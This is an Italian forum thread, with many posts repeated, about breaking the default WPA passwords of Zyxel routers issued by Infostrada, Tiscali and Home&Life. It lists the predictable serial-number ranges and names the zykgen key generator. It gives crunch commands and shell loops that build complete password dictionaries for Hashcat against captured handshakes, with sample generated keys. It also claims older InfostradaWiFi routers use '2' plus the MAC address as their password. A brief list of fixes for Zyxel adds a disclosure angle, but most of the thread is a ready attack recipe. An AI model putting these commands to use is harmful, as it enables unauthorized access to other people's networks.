Ciao ragazzi ma funziona con il modello VMG8828-B50B con ssid Wind3 HUB-xxxxxx? Io ho provato ma non funziona (almeno non con l'algoritmo Cosmopolitan)? Addirittura questo modello non esiste nemmeno su internet...
Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
Puoi inviarmi in privato una foto del router? e magari il manuale che viene fornito dall'ISP e tutte le informazioni che hai a riguardo, con che offerta viene fornito ecc.. Altrimenti non posso aiutarti, inizio a pensare sia solo un'etichetta farlocca per propinare i loro router, ma senza foto non posso esserne sicuro.Ciao ragazzi ma funziona con il modello VMG8828-B50B con ssid Wind3 HUB-xxxxxx? Io ho provato ma non funziona (almeno non con l'algoritmo Cosmopolitan)? Addirittura questo modello non esiste nemmeno su internet...
Puoi inviarmi in privato una foto del router? e magari il manuale che viene fornito dall'ISP e tutte le informazioni che hai a riguardo, con che offerta viene fornito ecc.. Altrimenti non posso aiutarti, inizio a pensare sia solo un'etichetta farlocca per propinare i loro router, ma senza foto non posso esserne sicuro.
Fai il build includendo i sorgenti provenienti da più file separati? ti escono messaggi di errore?. Non ho mai fatto girare go su android ma leggendo in giro mi sembra una cosa ancora molto in fase alpha con termux. Consiglierei di utilizzare direttamente go mobile per crearsi applicativi su android in un file apk, fammi sapere se hai problemiCiao J4ck, sto cercando di fare il run del repository che hai pubblicato si GitHub su un telefono android 9 con termux. Ho inoltre anche termux api installato. Riesco ad eseguire semplici programmi come faccio di solito se il build me li creo da solo ma non so eseguire la tua repository e testarla. Sto cercando di fare un test con il router pubblicato sul manuale della Wind. Mi potete dare una mano gentilmente?
Ho permission denied quando provo a spostare es cocktail.go su home$ go version
go version go1.13.6 android/arm64
$ which go
/data/data/com.termux/files/usr/bin/go
$ go get github.com/luc10/zykgen/cmd/zykgen
$ ls
batt.go mygo storage
$ ls mygo bin src
$ ls src
ls: cannot access 'src': No such file or directory $ ls bin
ls: cannot access 'bin': No such file or directory $ ls
batt.go mygo storage
$ ls storage
dcim external-1 music shared downloads movies pictures
Batt.go mi va benissimo poi il nulla. Sono fermo qui...
Buonasera a tutti, chi mi può dire se ho capito tutto? Allora il tool da GitHub ti dà la password subito un volta inserito zykgen -c SV18xxxxxxxx o genera una wordlist la quale si deve confrontare come hash con il capture es pmkid?
[...]
I router Zyxel ( modelli VMG8823, VMG8825 ) che hanno come SSID :
"Home&Life SuperWiFi-xxxx" (lunghezza password 16 caratteri)
"Infostrada-xxxxxx" (lunghezza password 10 caratteri)
"TISCALI_xxxx" (lunghezza password 10 caratteri)
[...]
Sempre cosmopolitan per tutti i casi che ho scritto, per trovare degli esempi basta cercare su google immagini dei retro dei router o anche su youtube delle recensioniDovresti specificare la lunghezza della chiave ed il secondo valore del range relativo al SN, a questo punto avrai la tua wordlist.
Messaggio unito automaticamente:
Ciao,
il cocktail Cosmopolitan e' valido certamente per il SSID Infostrada con length 10; stessa lunghezza per Tiscali ma il cocktail?
E per quanto riguarda Home&Life, lunghezza 16 ma quale cocktail?
Non ho a portata di mano chiavi da analizzare.
Grazie.
Sempre cosmopolitan per tutti i casi che ho scritto, per trovare degli esempi basta cercare su google immagini dei retro dei router o anche su youtube delle recensioni
Sicuramente qualcosa che ha a che fare il settaggio di goroot e gopath.Magari potresti aggiungere qualche dettaglio su cosa non riesci a fare.
Ciao a tutti, vi volevo segnalare il seguente codice su github:
I router Zyxel ( modelli VMG8823, VMG8825 ) che hanno come SSID :
"Home&Life SuperWiFi-xxxx" (lunghezza password 16 caratteri)
"Infostrada-xxxxxx" (lunghezza password 10 caratteri)
"TISCALI_xxxx" (lunghezza password 10 caratteri)
generano la password di default della WPA usando il proprio codice seriale (il codice seriale, è un codice identificativo del router, non è la password wpa! ) . Il problema è che tale codice è facile da indovinare perchè seguono un pattern abbastanza semplice:
"Home&Life SuperWiFi-xxxx"/"Home&Life 2.4GHz" Range seriali:
S182V00000000-S182V99999999
S192V00000000-S192V99999999
"Infostrada-xxxxxx" Range seriali:
S172V00000000-S172V99999999
S182V00000000-S182V99999999
"TISCALI_****" Range seriali:
S172V00000000-S172V99999999
S182V00000000-S182V99999999
Il primo carattere è sempre un 'S'.
Partendo dal codice golang che è già stato implementato, dovete modificarlo in modo da fare un bruteforce nel range dei codici seriali che vi ho messo sopra , calcolare la corrispondente password WPA usando le funzioni che sono già state implementate (in base al tipo di rete dovete scegliere se creare chiavi da 10 o 16 caratteri, guarda sopra per dettagli) e salvarle tutte le password generate su un file di testo. Se tale file di testo venisse usato insieme ad Hashcat ed un handshake catturato, è possibile risalire alla password giusta in meno di mezz'ora.
- I due caratteri successivi dovrebbero essere l'anno di produzione del router, nell'esempio di sopra abbiamo 2017 ,2018 e 2019.
- La quarta e quinta lettera ('2V') è costante .
- Il resto della stringa varia da router a router
Possibili risoluzioni da suggerire a Zyxel:
N.B: Per ogni range, vengono generate circa 1Gb di chiavi, non vi preoccupate se il programma macina per un po', se volete aprire il file di testo vi consiglio di farlo con il programma "glogg".
- Utilizzare un seriale di tipo alfanumerico casuale anzichè puramente numerico con un pattern semplice.
- Offuscare il codice.
Le reti infostrada sono quelle dei router nuovi, per i router vecchi, che creano la rete con SSID InfostradaWiFi-****** , la password WPA di default è "2"+"MAC router".
EDIT:
Il modello VMG8823-B50B ,come fatto osservare nel seguente commento, trasmette il proprio seriale nelle probe response.
crunch 13 13 -t S172V%%%%%%%% + 0123456789 + > S172V.txt
crunch 13 13 -t S182V%%%%%%%% + 0123456789 + > S182V.txt
crunch 13 13 -t S192V%%%%%%%% + 0123456789 + > S192V.txt
# OUTPUT
root@kali:~/Serials# head S172V.txt
S172V00000000
S172V00000001
S172V00000002
S172V00000003
S172V00000004
S172V00000005
S172V00000006
S172V00000007
S172V00000008
S172V00000009
........
S172V99999999
while IFS= read -r LINE; do /root/go/bin/zykgen -l 10 -c "$LINE"; done < S172V.txt > S172Vpassword.txt
# OUTPUT
root@kali:~/Serials# head S172Vpassword.txt
M7BJGF4884
TK4YTMHQLT
P7FMBLMLFG
LTDR8D3CU8
F7B38TXYJY
F3TP7XHHRD
T747G3GGAF
J388CXDMKN
8B4E47HNBD
F8K4MKFG73
cat S192V.txt | xargs -n1 zykgen -l 10 -c > dizionario.txt
Attendo con ansiaCiao! avevo bisogno di un informazione: Quali modelli necessitano di quale cocktail? per tiscali è provato che funzionano con -l 10 e -c. hai le altre combinazioni? sto costruendo un dizionario totale
Ho generato con crunch la lista di tutti i seriali possibili ( che sono in sostanza di 3 tipi S172V, S182V, S192V ):
Codice:crunch 13 13 -t S172V%%%%%%%% + 0123456789 + > S172V.txt crunch 13 13 -t S182V%%%%%%%% + 0123456789 + > S182V.txt crunch 13 13 -t S192V%%%%%%%% + 0123456789 + > S192V.txt # OUTPUT root@kali:~/Serials# head S172V.txt S172V00000000 S172V00000001 S172V00000002 S172V00000003 S172V00000004 S172V00000005 S172V00000006 S172V00000007 S172V00000008 S172V00000009 ........ S172V99999999
Dopo, passo ogni linea nel plaintext al tuo keygen:
Codice:while IFS= read -r LINE; do /root/go/bin/zykgen -l 10 -c "$LINE"; done < S172V.txt > S172Vpassword.txt # OUTPUT root@kali:~/Serials# head S172Vpassword.txt M7BJGF4884 TK4YTMHQLT P7FMBLMLFG LTDR8D3CU8 F7B38TXYJY F3TP7XHHRD T747G3GGAF J388CXDMKN 8B4E47HNBD F8K4MKFG73
Comprimerò poi il dizionario con gzip. Se però sapessi le varie combinazioni di lenght e cocktail ottimizzerei le tempistiche
Saluti,
Peste666
scusate il file txt generato quanto e' grande???
Ciao! avevo bisogno di un informazione: Quali modelli necessitano di quale cocktail? per tiscali è provato che funzionano con -l 10 e -c. hai le altre combinazioni? sto costruendo un dizionario totale
Ho generato con crunch la lista di tutti i seriali possibili ( che sono in sostanza di 3 tipi S172V, S182V, S192V ):
Codice:crunch 13 13 -t S172V%%%%%%%% + 0123456789 + > S172V.txt crunch 13 13 -t S182V%%%%%%%% + 0123456789 + > S182V.txt crunch 13 13 -t S192V%%%%%%%% + 0123456789 + > S192V.txt # OUTPUT root@kali:~/Serials# head S172V.txt S172V00000000 S172V00000001 S172V00000002 S172V00000003 S172V00000004 S172V00000005 S172V00000006 S172V00000007 S172V00000008 S172V00000009 ........ S172V99999999
Dopo, passo ogni linea nel plaintext al tuo keygen:
Codice:while IFS= read -r LINE; do /root/go/bin/zykgen -l 10 -c "$LINE"; done < S172V.txt > S172Vpassword.txt # OUTPUT root@kali:~/Serials# head S172Vpassword.txt M7BJGF4884 TK4YTMHQLT P7FMBLMLFG LTDR8D3CU8 F7B38TXYJY F3TP7XHHRD T747G3GGAF J388CXDMKN 8B4E47HNBD F8K4MKFG73
Comprimerò poi il dizionario con gzip. Se però sapessi le varie combinazioni di lenght e cocktail ottimizzerei le tempistiche
Saluti,
Peste666
EDIT:
Quel comando è stralento. Per ora il più veloce che sono riuscito ad ottenere è questo:
Codice:cat S192V.txt | xargs -n1 zykgen -l 10 -c > dizionario.txt